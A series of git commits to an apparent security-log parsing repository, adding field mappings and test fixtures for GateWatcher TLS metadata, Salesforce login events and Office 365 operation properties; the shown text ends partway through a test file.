From 19383dc28b0a3a0e9a42995cf66cd68f11194583 Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Tue, 12 Nov 2024 11:43:06 +0100 Subject: [PATCH 020/150] Parsing of TLS metadata using ECS tls.server.* fields and two custom fields --- GateWatcher/aioniq/_meta/fields.yml | 12 ++++++++---- GateWatcher/aioniq/ingest/parser.yml | 14 +++++++++++++- 2 files changed, 21 insertions(+), 5 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index d0d85f7f6..7fb7e28af 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml @@ -384,10 +384,14 @@ gatewatcher.tlp: name: gatewatcher.tlp type: text -gatewatcher.tls: - description: This field represents the tls field in a network metadata (used in - legacy format log) - name: gatewatcher.tls +gatewatcher.tls.sni: + description: This field represents the TLS SNI field in a TLS metadata + name: gatewatcher.tls.sni + type: text + +gatewatcher.tls.fingerprint: + description: This field represents the TLS server fingerprint field in a TLS metadata + name: gatewatcher.tls.fingerprint type: text gatewatcher.ttp: diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index ba98a034e..b71064e6d 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -29,6 +29,8 @@ pipeline: description: DGA - name: retrohunt description: Retrohunt + - name: tls + description: TLS stages: common: actions: @@ -122,7 +124,6 @@ stages: gatewatcher.sip: "{{json_load.message.sip}}" gatewatcher.smb: "{{json_load.message.smb}}" gatewatcher.ssh: "{{json_load.message.ssh}}" - gatewatcher.tls: "{{json_load.message.tls}}" file.hash.sha256: "{{json_load.message.fileinfo.sha256}}" gatewatcher.dhcp: "{{json_load.message.dhcp}}" gatewatcher.dnp3: "{{json_load.message.dnp3}}" @@ -202,3 +203,14 @@ stages: gatewatcher.targeted_countries: "{{json_load.message.targeted_countries}}" gatewatcher.targeted_platforms: "{{json_load.message.targeted_platforms}}" gatewatcher.targeted_organizations: "{{json_load.message.targeted_organizations}}" + tls: + actions: + - set: + tls.server.issuer: "{{json_load.message.tls.issuerdn}}" + tls.server.not_before: "{{json_load.message.tls.notbefore}}" + tls.server.certificate_chain: "{{json_load.message.tls.chain}}" + tls.server.subject: "{{json_load.message.tls.subject}}" + gatewatcher.tls.sni: "{{json_load.message.tls.sni}}" + gatewatcher.tls.fingerprint: "{{json_load.message.tls.fingerprint}}" + tls.version: "{{json_load.message.tls.version}}" + tls.server.not_after: "{{json_load.message.tls.notafter}}" From dabf885f938ac4fb194fce490569c8689ef40983 Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Tue, 12 Nov 2024 11:52:07 +0100 Subject: [PATCH 021/150] Updated tests --- GateWatcher/aioniq/tests/codebreaker.json | 2 +- GateWatcher/aioniq/tests/dga.json | 2 +- GateWatcher/aioniq/tests/malcore.json | 2 +- GateWatcher/aioniq/tests/retrohunt.json | 2 +- GateWatcher/aioniq/tests/sigflow-alert.json | 2 +- GateWatcher/aioniq/tests/sigflow-file.json | 2 +- GateWatcher/aioniq/tests/sigflow-meta.json | 2 +- 7 files changed, 7 insertions(+), 7 deletions(-) diff --git a/GateWatcher/aioniq/tests/codebreaker.json b/GateWatcher/aioniq/tests/codebreaker.json index f16f95623..6d7eb789a 100644 --- a/GateWatcher/aioniq/tests/codebreaker.json +++ b/GateWatcher/aioniq/tests/codebreaker.json @@ -17,7 +17,7 @@ "module": "powershell", "severity": 1 }, - "@timestamp": "2023-03-22T10:32:50.269000Z", + "@timestamp": "2023-03-22T10:30:37.145000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json index b9db082ca..9d702ce4d 100644 --- a/GateWatcher/aioniq/tests/dga.json +++ b/GateWatcher/aioniq/tests/dga.json @@ -17,7 +17,7 @@ "module": "dga", "severity": 1 }, - "@timestamp": "2023-03-22T10:46:08.487000Z", + "@timestamp": "2023-03-22T10:25:54.903000Z", "destination": { "address": "pgoadcmgqfacj.com", "domain": "pgoadcmgqfacj.com", diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json index ba95cc211..b5d0a4f69 100644 --- a/GateWatcher/aioniq/tests/malcore.json +++ b/GateWatcher/aioniq/tests/malcore.json @@ -20,7 +20,7 @@ "info" ] }, - "@timestamp": "2023-03-22T10:53:13.408000Z", + "@timestamp": "2023-03-22T10:35:22.615000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/retrohunt.json b/GateWatcher/aioniq/tests/retrohunt.json index fd29bcfa4..7c8728304 100644 --- a/GateWatcher/aioniq/tests/retrohunt.json +++ b/GateWatcher/aioniq/tests/retrohunt.json @@ -17,7 +17,7 @@ "module": "retrohunt", "severity": 1 }, - "@timestamp": "2023-06-12T10:12:39.001000Z", + "@timestamp": "2023-06-09T14:08:46.845000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json index 1de9534f5..626ee8eb7 100644 --- a/GateWatcher/aioniq/tests/sigflow-alert.json +++ b/GateWatcher/aioniq/tests/sigflow-alert.json @@ -19,7 +19,7 @@ "module": "alert", "severity": 1 }, - "@timestamp": "2023-03-22T10:44:08.001000Z", + "@timestamp": "2023-03-22T10:25:55.690000Z", "destination": { "address": "2.2.2.2", "bytes": 90364, diff --git a/GateWatcher/aioniq/tests/sigflow-file.json b/GateWatcher/aioniq/tests/sigflow-file.json index 2e1580dce..7e9cc8b6a 100644 --- a/GateWatcher/aioniq/tests/sigflow-file.json +++ b/GateWatcher/aioniq/tests/sigflow-file.json @@ -16,7 +16,7 @@ ], "module": "fileinfo" }, - "@timestamp": "2023-03-22T10:44:07.998000Z", + "@timestamp": "2023-03-22T10:25:55.469000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/sigflow-meta.json b/GateWatcher/aioniq/tests/sigflow-meta.json index 4da5dbc30..6e8cba037 100644 --- a/GateWatcher/aioniq/tests/sigflow-meta.json +++ b/GateWatcher/aioniq/tests/sigflow-meta.json @@ -16,7 +16,7 @@ ], "module": "http" }, - "@timestamp": "2023-03-22T10:44:07.997000Z", + "@timestamp": "2023-03-22T10:25:55.377000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", From 9336df505b67a0453815a0e29b09800fa904a387 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Tue, 12 Nov 2024 13:19:50 +0200 Subject: [PATCH 022/150] Fix: Salesforce login event --- .../salesforce-events/ingest/parser.yml | 9 +++ .../tests/salesforce_complete_event.json | 6 +- .../tests/salesforce_complete_event_1.json | 6 +- .../tests/salesforce_login_event.json | 9 +++ .../tests/salesforce_login_event_1.json | 69 +++++++++++++++++++ .../tests/session_integrity.json | 14 ++-- 6 files changed, 107 insertions(+), 6 deletions(-) create mode 100644 Salesforce/salesforce-events/tests/salesforce_login_event_1.json diff --git a/Salesforce/salesforce-events/ingest/parser.yml b/Salesforce/salesforce-events/ingest/parser.yml index 01b66855f..54db25d6c 100644 --- a/Salesforce/salesforce-events/ingest/parser.yml +++ b/Salesforce/salesforce-events/ingest/parser.yml @@ -147,6 +147,14 @@ stages: user.name: "{{json_event.output.USERNAME}}" filter: "{{json_event.output.USERNAME != None}}" + - set: + user.name: "{{json_event.output.USER_NAME}}" + filter: "{{json_event.output.USER_NAME != None and '@' not in json_event.output.USER_NAME}}" + + - set: + user.email: "{{json_event.output.USER_NAME}}" + filter: "{{json_event.output.USER_NAME != None and '@' in json_event.output.USER_NAME}}" + - set: user.email: "{{json_event.output.USER}}" filter: "{{json_event.output.USER != None}}" @@ -201,6 +209,7 @@ stages: tls.cipher: "{{json_event.output.CIPHER_SUITE}}" tls.version: "{{json_event.output.TLS_PROTOCOL}}" + url.original: "{{json_event.output.LOGIN_URL}}" host.id: "{{json_event.output.DEVICE_ID}}" host.os.name: "{{json_event.output.OS_NAME}}" host.os.version: "{{json_event.output.OS_VERSION}}" diff --git a/Salesforce/salesforce-events/tests/salesforce_complete_event.json b/Salesforce/salesforce-events/tests/salesforce_complete_event.json index 03b6811ee..ceeb7b881 100644 --- a/Salesforce/salesforce-events/tests/salesforce_complete_event.json +++ b/Salesforce/salesforce-events/tests/salesforce_complete_event.json @@ -45,6 +45,9 @@ "related": { "ip": [ "1.2.3.4" + ], + "user": [ + "test_user" ] }, "salesforce": { @@ -119,7 +122,8 @@ "query": "queryParam1=val1&queryParam2=val2" }, "user": { - "id": "00530000009M943" + "id": "00530000009M943", + "name": "test_user" }, "user_agent": { "device": { diff --git a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json index 051638d22..89c90352a 100644 --- a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json +++ b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json @@ -45,6 +45,9 @@ "related": { "ip": [ "1.2.3.4" + ], + "user": [ + "test_user" ] }, "salesforce": { @@ -115,7 +118,8 @@ "path": "/sObject/0064100000JXITSAA5/view" }, "user": { - "id": "00530000009M943" + "id": "00530000009M943", + "name": "test_user" }, "user_agent": { "name": "Chrome", diff --git a/Salesforce/salesforce-events/tests/salesforce_login_event.json b/Salesforce/salesforce-events/tests/salesforce_login_event.json index e87c6f5a9..7719dc746 100644 --- a/Salesforce/salesforce-events/tests/salesforce_login_event.json +++ b/Salesforce/salesforce-events/tests/salesforce_login_event.json @@ -28,6 +28,15 @@ "address": "192.168.0.1", "ip": "192.168.0.1" }, + "url": { + "domain": "login.salesforce.com", + "original": "https://login.salesforce.com", + "port": 443, + "registered_domain": "salesforce.com", + "scheme": "https", + "subdomain": "login", + "top_level_domain": "com" + }, "user": { "email": "john.doe@example.com" } diff --git a/Salesforce/salesforce-events/tests/salesforce_login_event_1.json b/Salesforce/salesforce-events/tests/salesforce_login_event_1.json new file mode 100644 index 000000000..ed22aefee --- /dev/null +++ b/Salesforce/salesforce-events/tests/salesforce_login_event_1.json @@ -0,0 +1,69 @@ +{ + "input": { + "message": "{\"EVENT_TYPE\":\"Login\",\"TIMESTAMP\":\"20241026044641.024\",\"REQUEST_ID\":\"request_id_test\",\"ORGANIZATION_ID\":\"ORG_ID_TEST\",\"USER_ID\":\"USER_ID_TEST\",\"RUN_TIME\":\"47\",\"CPU_TIME\":\"12\",\"URI\":\"/services/oauth2/token\",\"SESSION_KEY\":\"\",\"LOGIN_KEY\":\"xxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"\",\"DB_TOTAL_TIME\":\"29963703\",\"LOGIN_TYPE\":\"i\",\"BROWSER_TYPE\":\"python-requests/2.28.0\",\"API_TYPE\":\"\",\"API_VERSION\":\"9998.0\",\"USER_NAME\":\"user.integration@test.com\",\"TLS_PROTOCOL\":\"TLSv1.3\",\"CIPHER_SUITE\":\"TLS_AES_256_GCM_SHA384\",\"LOGIN_URL\":\"test.my.salesforce.com\",\"AUTHENTICATION_METHOD_REFERENCE\":\"\",\"LOGIN_SUB_TYPE\":\"oauthclientcredentials\",\"AUTHENTICATION_SERVICE_ID\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-26T04:46:41.024Z\",\"USER_ID_DERIVED\":\"USER_ID_TEST_IA4\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\",\"LOGIN_STATUS\":\"LOGIN_NO_ERROR\",\"SOURCE_IP\":\"1.2.3.4\",\"FORWARDED_FOR_IP\":\"\"}" + }, + "expected": { + "message": "{\"EVENT_TYPE\":\"Login\",\"TIMESTAMP\":\"20241026044641.024\",\"REQUEST_ID\":\"request_id_test\",\"ORGANIZATION_ID\":\"ORG_ID_TEST\",\"USER_ID\":\"USER_ID_TEST\",\"RUN_TIME\":\"47\",\"CPU_TIME\":\"12\",\"URI\":\"/services/oauth2/token\",\"SESSION_KEY\":\"\",\"LOGIN_KEY\":\"xxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"\",\"DB_TOTAL_TIME\":\"29963703\",\"LOGIN_TYPE\":\"i\",\"BROWSER_TYPE\":\"python-requests/2.28.0\",\"API_TYPE\":\"\",\"API_VERSION\":\"9998.0\",\"USER_NAME\":\"user.integration@test.com\",\"TLS_PROTOCOL\":\"TLSv1.3\",\"CIPHER_SUITE\":\"TLS_AES_256_GCM_SHA384\",\"LOGIN_URL\":\"test.my.salesforce.com\",\"AUTHENTICATION_METHOD_REFERENCE\":\"\",\"LOGIN_SUB_TYPE\":\"oauthclientcredentials\",\"AUTHENTICATION_SERVICE_ID\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-26T04:46:41.024Z\",\"USER_ID_DERIVED\":\"USER_ID_TEST_IA4\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\",\"LOGIN_STATUS\":\"LOGIN_NO_ERROR\",\"SOURCE_IP\":\"1.2.3.4\",\"FORWARDED_FOR_IP\":\"\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "Login", + "type": [ + "start" + ] + }, + "@timestamp": "2034-02-21T02:43:24.464103Z", + "organization": { + "id": "ORG_ID_TEST" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "salesforce": { + "api": { + "version": "9998.0" + }, + "login": { + "key": "xxxxxxxxxxxxx", + "status": "LOGIN_NO_ERROR", + "sub_type": "oauthclientcredentials" + }, + "request": { + "id": "request_id_test" + }, + "user": { + "type": "Standard" + } + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "tls": { + "cipher": "TLS_AES_256_GCM_SHA384", + "version": "TLSv1.3" + }, + "url": { + "original": "test.my.salesforce.com", + "path": "/services/oauth2/token" + }, + "user": { + "email": "user.integration@test.com", + "id": "USER_ID_TEST" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Python Requests", + "original": "python-requests/2.28.0", + "os": { + "name": "Other" + }, + "version": "2.28" + } + } +} \ No newline at end of file diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json index 39e8a6363..1c01481e9 100644 --- a/Wallix/wallix-bastion/tests/session_integrity.json +++ b/Wallix/wallix-bastion/tests/session_integrity.json @@ -6,13 +6,19 @@ "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]", "event": { "action": "SSH_SHELL_SESSION", - "category": ["session"], + "category": [ + "session" + ], "dataset": "session_integrity", "outcome": "failure", - "type": ["info"] + "type": [ + "info" + ] }, "related": { - "user": ["adm@CORP.NET@1.1.1.1"] + "user": [ + "adm@CORP.NET@1.1.1.1" + ] }, "user": { "name": "adm@CORP.NET@1.1.1.1" @@ -21,4 +27,4 @@ "type": "SSH_SHELL_SESSION" } } -} +} \ No newline at end of file From 8ae4ab6122886eb074acbfd38cfba1780259d7f1 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Tue, 12 Nov 2024 13:21:11 +0200 Subject: [PATCH 023/150] rollback other --- Wallix/wallix-bastion/tests/session_integrity.json | 14 ++++---------- 1 file changed, 4 insertions(+), 10 deletions(-) diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json index 1c01481e9..39e8a6363 100644 --- a/Wallix/wallix-bastion/tests/session_integrity.json +++ b/Wallix/wallix-bastion/tests/session_integrity.json @@ -6,19 +6,13 @@ "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]", "event": { "action": "SSH_SHELL_SESSION", - "category": [ - "session" - ], + "category": ["session"], "dataset": "session_integrity", "outcome": "failure", - "type": [ - "info" - ] + "type": ["info"] }, "related": { - "user": [ - "adm@CORP.NET@1.1.1.1" - ] + "user": ["adm@CORP.NET@1.1.1.1"] }, "user": { "name": "adm@CORP.NET@1.1.1.1" @@ -27,4 +21,4 @@ "type": "SSH_SHELL_SESSION" } } -} \ No newline at end of file +} From 7de6200578c1e1cf707f61343f99b60d962cdf82 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 12 Nov 2024 16:54:59 +0100 Subject: [PATCH 024/150] [Improvement] microsoft 365 / office 365 logs : Addition of operation properties --- .vscode/settings.json | 22 +++++ .../microsoft-365-defender/_meta/fields.yml | 5 + .../microsoft-365-defender/ingest/parser.yml | 15 +++ .../tests/test_cloud_app3.json | 6 ++ Office 365/o365/_meta/fields.yml | 6 ++ Office 365/o365/ingest/parser.yml | 15 +++ Office 365/o365/tests/clientipadress.json | 6 ++ .../o365/tests/exchange_item_aggregated.json | 6 ++ .../o365/tests/operation_properties_01.json | 91 +++++++++++++++++++ .../o365/tests/operation_properties_02.json | 88 ++++++++++++++++++ 10 files changed, 260 insertions(+) create mode 100644 .vscode/settings.json create mode 100644 Office 365/o365/tests/operation_properties_01.json create mode 100644 Office 365/o365/tests/operation_properties_02.json diff --git a/.vscode/settings.json b/.vscode/settings.json new file mode 100644 index 000000000..b92839d53 --- /dev/null +++ b/.vscode/settings.json @@ -0,0 +1,22 @@ +{ + "workbench.colorCustomizations": { + "activityBar.activeBackground": "#65c89b", + "activityBar.background": "#65c89b", + "activityBar.foreground": "#15202b", + "activityBar.inactiveForeground": "#15202b99", + "activityBarBadge.background": "#945bc4", + "activityBarBadge.foreground": "#e7e7e7", + "commandCenter.border": "#15202b99", + "sash.hoverBorder": "#65c89b", + "statusBar.background": "#42b883", + "statusBar.foreground": "#15202b", + "statusBarItem.hoverBackground": "#359268", + "statusBarItem.remoteBackground": "#42b883", + "statusBarItem.remoteForeground": "#15202b", + "titleBar.activeBackground": "#42b883", + "titleBar.activeForeground": "#15202b", + "titleBar.inactiveBackground": "#42b88399", + "titleBar.inactiveForeground": "#15202b99" + }, + "peacock.color": "#42b883" +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index 3a95175de..f69ef372d 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml @@ -777,6 +777,11 @@ microsoft.defender.observer.interface.type: name: microsoft.defender.observer.interface.type type: keyword +microsoft.defender.operation.properties: + description: Additional properties of the operation + name: microsoft.defender.operation.properties + type: object + microsoft.defender.report.id: description: Unique identifier for the event name: microsoft.defender.report.id diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index f22b21ce1..39d179145 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml @@ -259,6 +259,21 @@ stages: - set: network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}" filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}' + - set: + microsoft.defender.operation.properties: > + { + {%- for property in json_event.message.properties.RawEventData.OperationProperties -%} + {%- if property.Value != null -%} + {%- if property.Value | from_json == None -%} + "{{property.Name}}":"{{property.Value}}", + {%- else -%} + "{{property.Name}}": {{property.Value | from_json}}, + {%- endif -%} + {%- endif -%} + {%- endfor -%} + } + filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}' + set_alert_evidence_fields: actions: - set: diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json index d60cc39a1..764942b33 100644 --- a/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json +++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json @@ -84,6 +84,12 @@ ], "type": "Run" }, + "operation": { + "properties": { + "IsThrottled": "False", + "MailAccessType": "Bind" + } + }, "report": { "id": "98261974_20893_f747c19c-0664-45c8-aac9-8f16e7714de1" } diff --git a/Office 365/o365/_meta/fields.yml b/Office 365/o365/_meta/fields.yml index 96bb48e86..190ce038e 100644 --- a/Office 365/o365/_meta/fields.yml +++ b/Office 365/o365/_meta/fields.yml @@ -408,6 +408,12 @@ office365.logon_error: name: office365.logon_error type: keyword + +office365.operation.properties: + description: A list of objects describing the operation + name: office365.operation.properties + type: object + office365.record_type: description: The type of the operation name: office365.record_type diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index 62a4098df..879592c7b 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml @@ -118,6 +118,21 @@ stages: office365.audit.object_id: "{{json_event.message.ObjectId}}" office365.virus_info: "{{json_event.message.VirusInfo}}" office365.virus_vendor: "{{json_event.message.VirusVendor}}" + - set: + office365.operation.properties: > + { + {%- for property in json_event.message.OperationProperties -%} + {%- if property.Value != null -%} + {%- if property.Value | from_json == None -%} + "{{property.Name}}":"{{property.Value}}", + {%- else -%} + "{{property.Name}}": {{property.Value | from_json}}, + {%- endif -%} + {%- endif -%} + {%- endfor -%} + } + filter: '{{json_event.message.get("OperationProperties") != None}}' + - translate: dictionary: 0: "Regular" diff --git a/Office 365/o365/tests/clientipadress.json b/Office 365/o365/tests/clientipadress.json index c20107759..8555c1c9d 100644 --- a/Office 365/o365/tests/clientipadress.json +++ b/Office 365/o365/tests/clientipadress.json @@ -23,6 +23,12 @@ "target": "user" }, "office365": { + "operation": { + "properties": { + "IsThrottled": "False", + "MailAccessType": "Bind" + } + }, "record_type": 50, "result_status": "Succeeded", "user_type": { diff --git a/Office 365/o365/tests/exchange_item_aggregated.json b/Office 365/o365/tests/exchange_item_aggregated.json index 11cbfdefc..c15d8da5b 100644 --- a/Office 365/o365/tests/exchange_item_aggregated.json +++ b/Office 365/o365/tests/exchange_item_aggregated.json @@ -20,6 +20,12 @@ "context": { "aad_session_id": "dcdad6b2-f279-48c6-9ed8-3df0ffde4ece" }, + "operation": { + "properties": { + "IsThrottled": "False", + "MailAccessType": "Bind" + } + }, "record_type": 50, "result_status": "Succeeded", "user_type": { diff --git a/Office 365/o365/tests/operation_properties_01.json b/Office 365/o365/tests/operation_properties_01.json new file mode 100644 index 000000000..8354f4415 --- /dev/null +++ b/Office 365/o365/tests/operation_properties_01.json @@ -0,0 +1,91 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 / Office 365", + "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" + } + }, + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}" + }, + "expected": { + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", + "event": { + "action": "UpdateInboxRules", + "category": [ + "email", + "file" + ], + "code": "2", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-28T10:34:13Z", + "action": { + "id": 2, + "name": "UpdateInboxRules", + "outcome": "success", + "target": "user" + }, + "office365": { + "context": { + "aad_session_id": "xxxx-xxx-xxx-xxxx" + }, + "exchange": { + "mailbox_guid": "xxxx-xxx-xxx-xxxx" + }, + "operation": { + "properties": { + "RuleActions": [ + { + "ActionType": "Forward", + "ForwardFlags": "None", + "Recipients": [ + "john.doe@mail.fr", + "user@email.fr", + "asmithee@mailbox.fr", + "user.name@mail.fr" + ] + } + ], + "RuleCondition": "{(Exists(ItemClass))}", + "RuleId": -123, + "RuleOperation": "ModifyMailboxRule", + "RuleProvider": "RuleOrganizer", + "RuleState": "Enabled" + } + }, + "record_type": 2, + "result_status": "Succeeded", + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "xxxx-xxx-xxx-xxxx" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@mail.fr" + ] + }, + "service": { + "name": "Exchange" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "john.doe@mail.fr", + "id": "S-1-2-3-4", + "name": "john.doe@mail.fr" + } + } +} \ No newline at end of file diff --git a/Office 365/o365/tests/operation_properties_02.json b/Office 365/o365/tests/operation_properties_02.json new file mode 100644 index 000000000..7f11fadc3 --- /dev/null +++ b/Office 365/o365/tests/operation_properties_02.json @@ -0,0 +1,88 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 / Office 365", + "dialect_uuid": 